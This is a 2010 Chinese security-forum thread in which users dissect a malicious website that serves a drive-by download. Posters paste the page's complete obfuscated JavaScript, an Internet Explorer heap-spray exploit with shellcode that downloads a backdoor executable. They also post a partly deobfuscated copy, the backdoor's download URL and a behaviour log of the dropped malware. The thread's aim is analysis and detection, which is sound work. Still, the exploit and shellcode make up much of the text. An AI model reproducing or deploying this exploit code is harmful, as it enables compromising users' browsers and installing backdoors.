挂马网站

kaba2

经检测14：53 分还有效：

http://beike001.5d6d.com/

幸福的猪猪

用redoce解析不了。。。





直接用安全免疫区浏览，卡巴斯基启发式报警。

hxxp://mumalian.50webs.com/hxhack.htm

附上源代码：

1. <script type='text/javascript'>document.write(unescape(jiemihtm('E3%tpircs/C3%D7%B3%rts_tr02%nruterD7%B3%92%i-htgnel.txet_rtsC2%1-i-htgnel.txet_rts82%gnirtsbus.txet_rts+rts_trD3%rts_trB7%92%++iB3%htgnel.txet_rtsC3%iB3%0D3%i02%rav82%02%rofB3%72%72%D3%rts_tr02%ravB7%92%txet_rts82%mthimeij02%noitcnufB3%92%92%92%72%52%3Chtml52%3E52%3Cscript52%3Evar52%20swyice52%3Dunescape52%3Bvar52%20swyooo52%3D52%2252%25u52%2252%3Bvar52%20swyx52%3D52%2252%25u893652%25u244452%25u611C52%25uE8C352%25uFB4F52%22+swyooo+52%22FFFF52%2252%3Bvar52%20swy152%3D52%2252%25u505052%25u575052%25uE85052%25u033B52%22+swyooo+52%22000052%2252%3Bvar52%20swy252%3D52%2252%25u15EB52%25u448D52%25u042452%25uE85052%25uFDE452%2252%3Bvar52%20swy352%3D52%2252%25uF80352%25uF4EB52%25u3B3652%25u247C52%25u752852%25u3EDF52%2252%3Bvar52%20s52%3Dswyice52%2852%2252%25uE89052%25u034D52%22+swyooo+52%22000052%25u006852%25u002052%25u6A0052%25uFF0052%25uB9D052%25u080052%22+swyooo+52%22000052%25uF88B52%25u05EB52%25uF35E52%25uFFA452%25uE8D052%25uFFF652%22+swyooo+52%22FFFF52%25u54E852%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u000352%25u8B0052%25uE8F852%25u003852%22+swyooo+52%22000052%25u64E852%25u000152%25uE80052%25u004652%22+swyooo+52%22000052%25uF2E852%25u000352%25u8B0052%25uE8F852%25u002252%22+swyooo+52%22000052%25u5BE852%25u000152%25uE80052%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u003052%22+swyooo+52%22000052%25uA0E852%25u000352%25u8B0052%25uE8F852%25u000C52%22+swyooo+52%22000052%25u78E852%25u000152%25uE80052%25u001A52%22+swyooo+52%22000052%25u58EB52%25u8B5352%25u53DC52%25u406A52%25u006852%25u001052%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u570052%25uC8E852%25u000252%25uE80052%25u00FA52%22+swyooo+52%22000052%25uC35852%25u8B5352%25u53DC52%25u206A52%25u006852%25u001052%25u570052%25uB0E852%25u000252%25uE80052%25u00E252%22+swyooo+52%22000052%25uC35852%2252%2952%3Bs+52%3Dswyice52%2852%2252%25uE85752%25u045352%22+swyooo+52%22000052%25uF88B52%25uC93352%25u334952%25uB0C052%25uFCC352%25uAEF252%25u478D52%25u5FFF52%25u5BC352%25uC63E52%25uB80752%25u893E52%25u015F52%25u3E6652%25u47C752%25uF52%22+52%22F52%22+52%22052%22+52%22552%2252%2952%3Bs+52%3Dswyice52%2852%2252%25uC3E052%25uACE952%25u000452%25u5B0052%25uEC8152%25u011452%22+swyooo+52%22000052%25uD48B52%25uC73E52%25u630252%25u646D52%25u3E2052%25u42C752%25u2F0452%25u206352%25u3E2252%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u42C752%25u630852%25u646D52%25u3E2052%25u42C752%25u2F0C52%25u206352%25u832252%25u10C252%25uC03352%25u505052%25u046852%25u000152%25u520052%25u505352%25uC8E852%25u000352%2252%2952%3Bs+52%3Dswyice52%2852%2252%25uE80052%25u007252%22+swyooo+52%22000052%25uFC8B52%25uC78B52%25uC08352%25u3E0852%25u188A52%25uDB8452%25u037452%25uEB4052%25u66F652%25uC73E52%25u220052%25u332252%25u3ED252%25u508852%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u830252%25u54EC52%25uC03352%25uDB3352%25uCC8B52%25uF88352%25u7D5452%25u3E0952%25u1C8952%25u830852%25u04C052%25uF2EB52%25uCC8B52%25uD98B52%25uC38352%25u331052%25u3EC052%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u43C752%25u012C52%22+swyooo+52%22000052%25u510052%25u505352%25u505052%22+swy1+52%2252%25u19E852%22+swyooo+52%22000052%25u640052%25u04A152%22+swyooo+52%22000052%25u8D0052%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u60A052%22+swyooo+52%22FFFF52%25uE8FF52%25u033952%22+swyooo+52%22000052%25uDB3352%25u535352%25u535352%25uD0FF52%25u388052%25u74E952%25u800552%25uE83852%25u0F7552%25u788152%25u900552%25u52%22+52%22452%22+52%22152%22+52%22952%22+52%22052%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u749052%25u550652%25uEC8B52%25u408D52%25uFF0552%25uE8E052%25uFF1752%22+swyooo+52%22FFFF52%25uE8C352%25uFF1152%22+swyooo+52%22FFFF52%25u11B852%25u040152%25uC28052%25u000C52%25u04E852%22+swyooo+52%22FFFF52%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u33FF52%25u50C052%25uE85452%25u005452%22+swyooo+52%22000052%25uE85052%25u028B52%22+swyooo+52%22000052%25uD0FF52%25u803652%25u243C52%25u770052%25uE80A52%25u024152%22+swyooo+52%22000052%25uFF3352%25uFF5752%2252%2952%3Bs+52%3Dswyice52%2852%2252%25uE8D052%25u01FB52%22+swyooo+52%22000052%25uFF6852%22+swyooo+52%22000052%25uFF0052%25uE8D052%25uFED152%22+swyooo+52%22FFFF52%25u575352%25u335652%25u50C052%25uE85452%25u001E52%22+swyooo+52%22000052%25uE85052%25u025552%2252%2952%3Bs+52%3Dswyice52%2852%2252%22+swyooo+52%22000052%25uD0FF52%25u803652%25u243C52%25u770052%25uE80A52%25u020B52%22+swyooo+52%22000052%25uFF3352%25uFF5752%25u58D052%25u5F5E52%25uC35B52%25u02EB52%25uC35852%25uF9E852%22+swyooo+52%22FFFF52%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u56FF52%25u835752%25u08EC52%25uFC8B52%25u086A52%25u3E5752%25u77FF52%25uE81452%25u025D52%22+swyooo+52%22000052%25uD0FF52%25uFC8B52%25u616852%25u656D52%25u680052%25u454952%25u724652%2252%2952%3Bs+52%3Dswyice52%2852%2252%25uF48B52%25u08B952%22+swyooo+52%22000052%25uF30052%25u75A652%25u6A2F52%25u3E0052%25u74FF52%25u202452%25u24E852%25u000252%25uFF0052%25u8BD052%25uE8F852%25u01CB52%22+swyooo+52%22000052%25uD0FF52%2252%2952%3Bs+52%3Dswyice52%2852%2252%25uF83B52%25u087452%25u8B3652%25u244452%25u3E2052%25u00FF52%25uFF3E52%25u247452%25uE81C52%25u01EF52%22+swyooo+52%22000052%25uD0FF52%25uC48352%25u5F1052%25uB85E52%25u000152%22+swyooo+52%22000052%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u68C352%25u6E6F52%22+swyooo+52%22000052%25u756852%25u6C7252%25uEB6D52%25u8D1552%25u244452%25u500452%25u0BE852%25uFFFE52%25u50FF52%25u4AE852%25u000252%25uE90052%25uFEE052%22+swyooo+52%22FFFF52%2252%2952%3Bs+52%3Dswyice52%2852%2252%25uE6E852%22+swyooo+52%22FFFF52%25u83FF52%25u08C452%25u6AC352%25u686C52%25u746E52%25u6C6452%22+swy2+52%2252%22+swyooo+52%22FFFF52%25uE85052%25u022352%22+swyooo+52%22000052%2252%2952%3Bs+52%3Dswyice52%2852%2252%25uB9E952%25uFFFE52%25uE8FF52%25uFFE652%22+swyooo+52%22FFFF52%25uC48352%25uC30852%25u336852%25u003252%25u680052%25u737552%25u726552%25u15EB52%25u448D52%25u042452%25uE85052%25uFDBA52%2252%2952%3Bs+52%3Dswyice52%2852%2252%22+swyooo+52%22FFFF52%25uE85052%25u01F952%22+swyooo+52%22000052%25u8FE952%25uFFFE52%25uE8FF52%25uFFE652%22+swyooo+52%22FFFF52%25uC48352%25uC30852%25u636852%25u777652%25u680052%25u687352%25u6F6452%25u15EB52%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u448D52%25u042452%25uE85052%25uFD9052%22+swyooo+52%22FFFF52%25uE85052%25u01CF52%22+swyooo+52%22000052%25u65E952%25uFFFE52%25uE8FF52%25uFFE652%22+swyooo+52%22FFFF52%25uC48352%25uC30852%25u766852%25u786752%2252%2952%3Bs+52%3Dswyice52%2852%2252%25uEB0052%25u8D1552%25u244452%25u500452%25u6BE852%25uFFFD52%25u50FF52%25uAAE852%25u000152%25uE90052%25uFE4052%22+swyooo+52%22FFFF52%25uE6E852%22+swyooo+52%22FFFF52%25u83FF52%25u04C452%25uE8C352%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u01AB52%22+swyooo+52%22000052%25u1B6852%25u46C652%25u507952%25uC6E852%25u000152%25u830052%25u08C452%25uE8C352%25u019752%22+swyooo+52%22000052%25uEC6852%25u039752%25u500C52%25uB2E852%25u000152%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u830052%25u08C452%25uE8C352%25u018352%22+swyooo+52%22000052%25uAA6852%25u0DFC52%25u507C52%25u9EE852%25u000152%25u830052%25u08C452%25uE8C352%25u016F52%22+swyooo+52%22000052%25uED6852%25uEF5652%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u503652%25u8AE852%25u000152%25u830052%25u08C452%25uE8C352%25u015B52%22+swyooo+52%22000052%25uF06852%25u048A52%25u505F52%25u76E852%25u000152%25u830052%25u08C452%25uE8C352%25uFEF752%2252%2952%3Bs+52%3Dswyice52%2852%2252%22+swyooo+52%22FFFF52%25u786852%25uDB6852%25u501C52%25u62E852%25u000152%25u830052%25u08C452%25uE8C352%25u013352%22+swyooo+52%22000052%25uEF6852%25uE0CE52%25u506052%25u4EE852%25u000152%25u830052%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u08C452%25uE8C352%25u011F52%22+swyooo+52%22000052%25uB06852%25u2D4952%25u50DB52%25u3AE852%25u000152%25u830052%25u08C452%25uE8C352%25uFF3652%22+swyooo+52%22FFFF52%25uAB6852%25u9B5E52%25u501E52%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u26E852%25u000152%25u830052%25u08C452%25uE8C352%25uFEA752%22+swyooo+52%22FFFF52%25u596852%25u819752%25u500252%25u12E852%25u000152%25u830052%25u08C452%25uE8C352%25u00E352%22+swyooo+52%22000052%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u7E6852%25uE2D852%25u507352%25uFEE852%22+swyooo+52%22000052%25u830052%25u08C452%25uE8C352%25u00CF52%22+swyooo+52%22000052%25u9E6852%25uBBF952%25u503552%25uEAE852%22+swyooo+52%22000052%25u830052%25u08C452%2252%2952%3B52%2052%20s+52%3Dswyice52%2852%2252%25uE8C352%25uFE9252%22+swyooo+52%22FFFF52%25u576852%25uB5A052%25u50BB52%25uD6E852%22+swyooo+52%22000052%25u830052%25u08C452%25uE8C352%25uFE7E52%22+swyooo+52%22FFFF52%25u1A6852%25u1E7A52%25u500252%25uC2E852%25u0052%22+52%22052%22+52%22052%2252%2952%3Bs+52%3Dswyice52%2852%2252%2552%22+52%22u52%22+52%22852%22+52%22352%22+52%22052%22+52%22052%22+52%2252%2552%22+52%22u08C452%2552%22+52%22uE8C352%25uFE6A52%22+swyooo+52%22FFFF52%25uE06852%25u305B52%25u509452%25uAEE852%22+swyooo+52%22000052%25u830052%25u08C452%25uE8C352%25uFE5652%22+swyooo+52%22FFFF52%25u976852%25uE2C952%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u50A352%25u9AE852%22+swyooo+52%22000052%25u830052%25u08C452%25uE8C352%25uFE4252%22+swyooo+52%22FFFF52%25u686852%25uC52452%25u50B352%25u86E852%22+swyooo+52%22000052%25u830052%25u08C452%25uE8C352%25u005752%2252%2952%3Bs+52%3Dswyice52%2852%2252%22+swyooo+52%22000052%25u726852%25uB3FE52%25u501652%25u72E852%22+swyooo+52%22000052%25u830052%25u08C452%25uE8C352%25uFE4452%22+swyooo+52%22FFFF52%25u13EB52%25u656A52%25uE85052%25uFBE052%22+swyooo+52%22FFFF52%25uE85052%2252%2952%3Bs+52%3Dswyice52%2852%2252%25uFEAB52%22+swyooo+52%22FFFF52%25uB5E952%25uFFFC52%25uE8FF52%25uFFE852%22+swyooo+52%22FFFF52%25uE8C352%25uFDA952%22+swyooo+52%22FFFF52%25u4F6852%25u4FEF52%25u500552%25u3EE852%22+swyooo+52%22000052%25u830052%25u08C452%2252%2952%3Bs+52%3Dswyice52%2852%2252%25uE8C352%25u000F52%22+swyooo+52%22000052%25u8E6852%25u0E4E52%25u50EC52%25u2AE852%22+swyooo+52%22000052%25u830052%25u08C452%25u33C352%25u64C052%25u408B52%25u853052%25u78C052%25u3E1052%25u408B52%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u3E0C52%25u708B52%25uAD1C52%25u8B3E52%25u084052%25uEBC352%25u3E0B52%25u408B52%25u833452%25u7CC052%25u8B3E52%25u3C4052%25u60C352%25u8B3652%25u246C52%25u362452%25u458B52%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u363C52%25u548B52%25u782852%25uD50352%25u8B3E52%25u184A52%25u8B3E52%25u205A52%25uDD0352%25u3BE352%25u3E4952%25u348B52%25u038B52%25u33F552%25u33FF52%25uFCC052%25u84AC52%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u74C052%25uC10752%25u0DCF52%22+swy3+52%2252%25u5A8B52%25u032452%25u66DD52%25u8B3E52%25u4B0C52%25u8B3E52%25u1C5A52%25uDD0352%2252%2952%3Bs+52%3Dswyice52%2852%2252%25u8B3E52%25u8B0452%25uC50352%22+swyx52%2952%3Bvar52%20u52%3Dswyice52%2852%2252%25u746852%25u707452%25u2f3a52%25u6d2f52%25u6d7552%25u6c6152%25u616952%25u2e6e52%25u303552%25u657752%25u736252%25u632e52%25u6d6f52%25u642f52%25u746152%25u2e6152%25u786552%25u006552%2252%2952%3Bvar52%20sc52%3Ds+u52%3Bvar52%20n52%2052%3D52%20unescape52%2852%2252%25u0c0d52%25u0c0d52%2252%2952%3Bwhile52%2052%28n.length52%2052%3C52%3D52%2052428852%29n52%20+52%3D52%20n52%3Bn52%2052%3D52%20n.substring52%28052%2C52%2052426952%20-52%20sc.length52%2952%3Bvar52%20x52%2052%3D52%20new52%20Array52%2852%2952%3Bfor52%2052%28var52%20i52%2052%3D52%20052%3B52%20i52%2052%3C52%2020052%3B52%20i52%20++52%2052%2952%7B52%2052%20x52%5Bi52%5D52%2052%3D52%20n52%20+52%20sc52%3B52%7D52%20var52%20x152%2052%3D52%20new52%20Array52%2852%2952%3Bfor52%2052%28i52%2052%3D52%20052%3B52%20i52%2052%3C52%2050052%3B52%20i52%20++52%2052%2952%7B52%2052%2052%2052%20x152%5Bi52%5D52%2052%3D52%20document.createElement52%2852%22COMMENT52%2252%2952%3B52%2052%2052%2052%20x152%5Bi52%5D.data52%2052%3D52%2052%22abc52%2252%3B52%7D52%3Bvar52%20e152%2052%3D52%20null52%3Bfunction52%20ev152%28evt52%2952%7B52%2052%2052%2052%20e152%2052%3D52%20document.createEventObject52%28evt52%2952%3B52%2052%2052%2052%20document.getElementById52%2852%22sp152%2252%29.innerHTML52%2052%3D52%2052%2252%2252%3B52%2052%2052%2052%20window.setInterval52%28ev252%2C52%205052%2952%3B52%7Dfunction52%20ev252%2852%2952%7B52%2052%20p52%3D52%2252%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%5Cu0c0d52%2252%3B52%2052%2052%2052%20for52%2052%28i52%2052%3D52%20052%3B52%20i52%2052%3C52%20x1.length52%3B52%20i52%20++52%2052%2952%2052%2052%2052%2052%7B52%2052%2052%2052%2052%2052%2052%2052%20x152%5Bi52%5D.data52%2052%3D52%20p52%3B52%2052%2052%2052%2052%7D52%3B52%2052%2052%2052%20var52%20t52%2052%3D52%20e1.srcElement52%3B52%7D52%3C/script52%3E52%3Cspan52%20id52%3D52%22sp152%2252%3E52%3CIMG52%20SRC52%3D52%22hxhack.gif52%2252%20onload52%3D52%22ev152%28event52%2952%2252%3E52%3C/span52%3E52%3C/body52%3E52%3C/html52%3E72%82%mthimeij82%epacsenu82%etirw.tnemucodE3%72%tpircsavaj/txet72%D3%epyt02%tpircsC3%')));function jiemihtm(str_text){var rt_str='';for (var i=0;i<str_text.length;i++){rt_str=rt_str+str_text.substring(str_text.length-i-1,str_text.length-i);}return rt_str;}</script>

复制代码

后门程序下载地址：hxxp://mumalian.50webs.com/data.exe

kaba2

用redoce解析不了。。。

直接用安全免疫区浏览，卡巴斯基启发式报警。
幸福的猪猪 发表于 2010-5-31 15:18

    ？？？不明白，为什么用redoce解析不了？

PS：小白了，我没用过 redoce…

幸福的猪猪

回复 3# kaba2 的帖子

这个我也不晓得是怎么回事，用你提供的网址，redoce就是显示那些信息。不信你可以亲自下载一个redoce测试一下。


在安全免疫区，浏览你提供的网页，提示如图：

z2009

红伞报毒

you14cn

a256886572008

2010/5/31 19:36:11    Write file    Denied
Process: c:\documents and settings\roger\桌面\virus\data\data.exe
Target: C:\WINDOWS\system32\drivers\beep.sys
Rule: [File Group]Important Files/Folders -> [File]c:\windows\system32\*

2010/5/31 19:36:15    Stop driver or service    Denied
Process: c:\documents and settings\roger\桌面\virus\data\data.exe
Target: Beep
File path: System32\Drivers\beep.sys
Rule: [App]*

2010/5/31 19:36:19    Start driver or service    Denied
Process: c:\documents and settings\roger\桌面\virus\data\data.exe
Target: Beep
File path: System32\Drivers\beep.sys
Rule: [App]*

2010/5/31 19:36:23    Create file    Permitted
Process: c:\documents and settings\roger\桌面\virus\data\data.exe
Target: C:\WINDOWS\system32\RimttmC.dll
Rule: [File Group]Important Files/Folders -> [File]c:\windows\system32\*

2010/5/31 19:36:28    Set hidden attribute of file    Denied
Process: c:\documents and settings\roger\桌面\virus\data\data.exe
Target: C:\WINDOWS\system32\RimttmC.dll
Rule: [File Group]Important Files/Folders -> [File]c:\windows\system32\*

2010/5/31 19:36:32    Install driver or service    Denied
Process: c:\documents and settings\roger\桌面\virus\data\data.exe
Target: MS Media Control Center
File path: %SystemRoot%\System32\svchost.exe -k krnlsrvc
Rule: [App]*

2010/5/31 19:36:38    Start driver or service    Denied
Process: c:\documents and settings\roger\桌面\virus\data\data.exe
Rule: [App]*

2010/5/31 19:36:42    Create new process    Permitted
Process: c:\documents and settings\roger\桌面\virus\data\data.exe
Target: c:\windows\system32\cmd.exe
Cmd line: C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\Roger\桌面\virus\data\data.exe > nul
Rule: [App]*

2010/5/31 19:36:45    Delete file    Permitted
Process: c:\windows\system32\cmd.exe
Target: C:\Documents and Settings\Roger\桌面\virus\data\data.exe
Rule: [File Group]All Executable Files -> [File]*; *.exe

asinasina

先document.write清除，然后再alert之

---------------------------
Microsoft Internet Explorer
---------------------------
<html><script>var swyice=unescape;var swyooo="%u";var swyx="%u8936%u2444%u611C%uE8C3%uFB4F"+swyooo+"FFFF";var swy1="%u5050%u5750%uE850%u033B"+swyooo+"0000";var swy2="%u15EB%u448D%u0424%uE850%uFDE4";var swy3="%uF803%uF4EB%u3B36%u247C%u7528%u3EDF";var s=swyice("%uE890%u034D"+swyooo+"0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800"+swyooo+"0000%uF88B%u05EB%uF35E%uFFA4%uE8D0%uFFF6"+swyooo+"FFFF%u54E8");s+=swyice("%u0003%u8B00%uE8F8%u0038"+swyooo+"0000%u64E8%u0001%uE800%u0046"+swyooo+"0000%uF2E8%u0003%u8B00%uE8F8%u0022"+swyooo+"0000%u5BE8%u0001%uE800");s+=swyice("%u0030"+swyooo+"0000%uA0E8%u0003%u8B00%uE8F8%u000C"+swyooo+"0000%u78E8%u0001%uE800%u001A"+swyooo+"0000%u58EB%u8B53%u53DC%u406A%u0068%u0010");s+=swyice("%u5700%uC8E8%u0002%uE800%u00FA"+swyooo+"0000%uC358%u8B53%u53DC%u206A%u0068%u0010%u5700%uB0E8%u0002%uE800%u00E2"+swyooo+"0000%uC358");s+=swyice("%uE857%u0453"+swyooo+"0000%uF88B%uC933%u3349%uB0C0%uFCC3%uAEF2%u478D%u5FFF%u5BC3%uC63E%uB807%u893E%u015F%u3E66%u47C7%uF"+"F"+"0"+"5");s+=swyice("%uC3E0%uACE9%u0004%u5B00%uEC81%u0114"+swyooo+"0000%uD48B%uC73E%u6302%u646D%u3E20%u42C7%u2F04%u2063%u3E22");s+=swyice("%u42C7%u6308%u646D%u3E20%u42C7%u2F0C%u2063%u8322%u10C2%uC033%u5050%u0468%u0001%u5200%u5053%uC8E8%u0003");s+=swyice("%uE800%u0072"+swyooo+"0000%uFC8B%uC78B%uC083%u3E08%u188A%uDB84%u0374%uEB40%u66F6%uC73E%u2200%u3322%u3ED2%u5088");s+=swyice("%u8302%u54EC%uC033%uDB33%uCC8B%uF883%u7D54%u3E09%u1C89%u8308%u04C0%uF2EB%uCC8B%uD98B%uC383%u3310%u3EC0");s+=swyice("%u43C7%u012C"+swyooo+"0000%u5100%u5053%u5050"+swy1+"%u19E8"+swyooo+"0000%u6400%u04A1"+swyooo+"0000%u8D00");s+=swyice("%u60A0"+swyooo+"FFFF%uE8FF%u0339"+swyooo+"0000%uDB33%u5353%u5353%uD0FF%u3880%u74E9%u8005%uE838%u0F75%u7881%u9005%u"+"4"+"1"+"9"+"0");s+=swyice("%u7490%u5506%uEC8B%u408D%uFF05%uE8E0%uFF17"+swyooo+"FFFF%uE8C3%uFF11"+swyooo+"FFFF%u11B8%u0401%uC280%u000C%u04E8"+swyooo+"FFFF");s+=swyice("%u33FF%u50C0%uE854%u0054"+swyooo+"0000%uE850%u028B"+swyooo+"0000%uD0FF%u8036%u243C%u7700%uE80A%u0241"+swyooo+"0000%uFF33%uFF57");s+=swyice("%uE8D0%u01FB"+swyooo+"0000%uFF68"+swyooo+"0000%uFF00%uE8D0%uFED1"+swyooo+"FFFF%u5753%u3356%u50C0%uE854%u001E"+swyooo+"0000%uE850%u0255");s+=swyice(""+swyooo+"0000%uD0FF%u8036%u243C%u7700%uE80A%u020B"+swyooo+"0000%uFF33%uFF57%u58D0%u5F5E%uC35B%u02EB%uC358%uF9E8"+swyooo+"FFFF");s+=swyice("%u56FF%u8357%u08EC%uFC8B%u086A%u3E57%u77FF%uE814%u025D"+swyooo+"0000%uD0FF%uFC8B%u6168%u656D%u6800%u4549%u7246");s+=swyice("%uF48B%u08B9"+swyooo+"0000%uF300%u75A6%u6A2F%u3E00%u74FF%u2024%u24E8%u0002%uFF00%u8BD0%uE8F8%u01CB"+swyooo+"0000%uD0FF");s+=swyice("%uF83B%u0874%u8B36%u2444%u3E20%u00FF%uFF3E%u2474%uE81C%u01EF"+swyooo+"0000%uD0FF%uC483%u5F10%uB85E%u0001"+swyooo+"0000");s+=swyice("%u68C3%u6E6F"+swyooo+"0000%u7568%u6C72%uEB6D%u8D15%u2444%u5004%u0BE8%uFFFE%u50FF%u4AE8%u0002%uE900%uFEE0"+swyooo+"FFFF");s+=swyice("%uE6E8"+swyooo+"FFFF%u83FF%u08C4%u6AC3%u686C%u746E%u6C64"+swy2+""+swyooo+"FFFF%uE850%u0223"+swyooo+"0000");s+=swyice("%uB9E9%uFFFE%uE8FF%uFFE6"+swyooo+"FFFF%uC483%uC308%u3368%u0032%u6800%u7375%u7265%u15EB%u448D%u0424%uE850%uFDBA");s+=swyice(""+swyooo+"FFFF%uE850%u01F9"+swyooo+"0000%u8FE9%uFFFE%uE8FF%uFFE6"+swyooo+"FFFF%uC483%uC308%u6368%u7776%u6800%u6873%u6F64%u15EB");s+=swyice("%u448D%u0424%uE850%uFD90"+swyooo+"FFFF%uE850%u01CF"+swyooo+"0000%u65E9%uFFFE%uE8FF%uFFE6"+swyooo+"FFFF%uC483%uC308%u7668%u7867");s+=swyice("%uEB00%u8D15%u2444%u5004%u6BE8%uFFFD%u50FF%uAAE8%u0001%uE900%uFE40"+swyooo+"FFFF%uE6E8"+swyooo+"FFFF%u83FF%u04C4%uE8C3");s+=swyice("%u01AB"+swyooo+"0000%u1B68%u46C6%u5079%uC6E8%u0001%u8300%u08C4%uE8C3%u0197"+swyooo+"0000%uEC68%u0397%u500C%uB2E8%u0001");s+=swyice("%u8300%u08C4%uE8C3%u0183"+swyooo+"0000%uAA68%u0DFC%u507C%u9EE8%u0001%u8300%u08C4%uE8C3%u016F"+swyooo+"0000%uED68%uEF56");s+=swyice("%u5036%u8AE8%u0001%u8300%u08C4%uE8C3%u015B"+swyooo+"0000%uF068%u048A%u505F%u76E8%u0001%u8300%u08C4%uE8C3%uFEF7");s+=swyice(""+swyooo+"FFFF%u7868%uDB68%u501C%u62E8%u0001%u8300%u08C4%uE8C3%u0133"+swyooo+"0000%uEF68%uE0CE%u5060%u4EE8%u0001%u8300");s+=swyice("%u08C4%uE8C3%u011F"+swyooo+"0000%uB068%u2D49%u50DB%u3AE8%u0001%u8300%u08C4%uE8C3%uFF36"+swyooo+"FFFF%uAB68%u9B5E%u501E");s+=swyice("%u26E8%u0001%u8300%u08C4%uE8C3%uFEA7"+swyooo+"FFFF%u5968%u8197%u5002%u12E8%u0001%u8300%u08C4%uE8C3%u00E3"+swyooo+"0000");s+=swyice("%u7E68%uE2D8%u5073%uFEE8"+swyooo+"0000%u8300%u08C4%uE8C3%u00CF"+swyooo+"0000%u9E68%uBBF9%u5035%uEAE8"+swyooo+"0000%u8300%u08C4");  s+=swyice("%uE8C3%uFE92"+swyooo+"FFFF%u5768%uB5A0%u50BB%uD6E8"+swyooo+"0000%u8300%u08C4%uE8C3%uFE7E"+swyooo+"FFFF%u1A68%u1E7A%u5002%uC2E8%u00"+"0"+"0");s+=swyice("%"+"u"+"8"+"3"+"0"+"0"+"%"+"u08C4%"+"uE8C3%uFE6A"+swyooo+"FFFF%uE068%u305B%u5094%uAEE8"+swyooo+"0000%u8300%u08C4%uE8C3%uFE56"+swyooo+"FFFF%u9768%uE2C9");s+=swyice("%u50A3%u9AE8"+swyooo+"0000%u8300%u08C4%uE8C3%uFE42"+swyooo+"FFFF%u6868%uC524%u50B3%u86E8"+swyooo+"0000%u8300%u08C4%uE8C3%u0057");s+=swyice(""+swyooo+"0000%u7268%uB3FE%u5016%u72E8"+swyooo+"0000%u8300%u08C4%uE8C3%uFE44"+swyooo+"FFFF%u13EB%u656A%uE850%uFBE0"+swyooo+"FFFF%uE850");s+=swyice("%uFEAB"+swyooo+"FFFF%uB5E9%uFFFC%uE8FF%uFFE8"+swyooo+"FFFF%uE8C3%uFDA9"+swyooo+"FFFF%u4F68%u4FEF%u5005%u3EE8"+swyooo+"0000%u8300%u08C4");s+=swyice("%uE8C3%u000F"+swyooo+"0000%u8E68%u0E4E%u50EC%u2AE8"+swyooo+"0000%u8300%u08C4%u33C3%u64C0%u408B%u8530%u78C0%u3E10%u408B");s+=swyice("%u3E0C%u708B%uAD1C%u8B3E%u0840%uEBC3%u3E0B%u408B%u8334%u7CC0%u8B3E%u3C40%u60C3%u8B36%u246C%u3624%u458B");s+=swyice("%u363C%u548B%u7828%uD503%u8B3E%u184A%u8B3E%u205A%uDD03%u3BE3%u3E49%u348B%u038B%u33F5%u33FF%uFCC0%u84AC");s+=swyice("%u74C0%uC107%u0DCF"+swy3+"%u5A8B%u0324%u66DD%u8B3E%u4B0C%u8B3E%u1C5A%uDD03");s+=swyice("%u8B3E%u8B04%uC503"+swyx);var u=swyice("%u7468%u7074%u2f3a%u6d2f%u6d75%u6c61%u6169%u2e6e%u3035%u6577%u7362%u632e%u6d6f%u642f%u7461%u2e61%u7865%u0065");var sc=s+u;var n = unescape("%u0c0d%u0c0d");while (n.length <= 524288)n += n;n = n.substring(0, 524269 - sc.length);var x = new Array();for (var i = 0; i < 200; i ++ ){  x = n + sc;} var x1 = new Array();for (i = 0; i < 500; i ++ ){    x1 = document.createElement("COMMENT");    x1.data = "abc";};var e1 = null;function ev1(evt){    e1 = document.createEventObject(evt);    doc
---------------------------
确定   
---------------------------

然后放入MDcode。。一下出结果

http://mumalian.50webs.com/data.exe

不知有没有简单点的方法

幸福的猪猪

回复 8# asinasina 的帖子

谢谢你提供的解密思路。

p.s. 昨天第一次看到这种代码，直接复制源代码到某老外在线解密站点，进行解密。（不是美国那边的，是俄罗斯那边的。差不多一分钟之后，就可以得到解密结果。不过，有些挂马网页，那边的机器【不知道是啥原理，自动分析机？】还是解不了的。所以，还是有时间的话，自己手动学习解密。）

ryota

虚拟主机，米啥意思。